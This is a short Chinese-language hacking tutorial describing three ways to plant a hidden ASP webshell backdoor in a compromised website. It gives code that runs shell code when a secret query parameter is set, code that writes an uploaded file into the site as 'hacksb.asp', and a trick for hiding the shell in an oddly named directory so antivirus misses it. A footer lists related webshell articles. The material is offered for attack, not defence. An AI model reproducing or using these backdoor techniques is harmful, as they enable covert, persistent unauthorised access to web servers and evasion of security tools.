第一种:
在我们要做手脚的asp文件里加入如下内容
<%if request("action")="ok" then%>
shell代码插在这里
<%end if%>
访问的时候在你作手脚的asp文件后面加上?action=ok,即可
第二种:
在我们要做手脚的asp文件里加入如下内容
<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("hacksb.asp"),2
%>
访问的时候在做手脚的asp文件后面加上?filer=xxx,
xxx为你本地上传的一个路径如C:\hacksb.asp,
上传后在做手脚的asp的同文件夹中会自动生成hacksb.asp
第三种:
前提得到system权限,
进入网站目录下一层
mkdir s…
copy hacksb.asp s…/
这样杀毒软件找不到的
访问http://网站/s…/hacksb.asp即可
只显示10条记录相关文章
利用图片隐藏ASP WebShell一句话后门 (浏览: 12132, 评论: 0)
利用系统保留文件名创建无法删除的webshell (浏览: 11422, 评论: 0)
手工注入,后台另类拿webshell搞定影院系统 (浏览: 8510, 评论: 0)
ECShop网店系统V2.6.2 后台拿webshell漏洞 (浏览: 20737, 评论: 1)
带后门webshell照样用 (浏览: 10832, 评论: 0)
利用系统保留文件名创建无法删除的webshell (浏览: 11422, 评论: 0)
手工注入,后台另类拿webshell搞定影院系统 (浏览: 8510, 评论: 0)
ECShop网店系统V2.6.2 后台拿webshell漏洞 (浏览: 20737, 评论: 1)
带后门webshell照样用 (浏览: 10832, 评论: 0)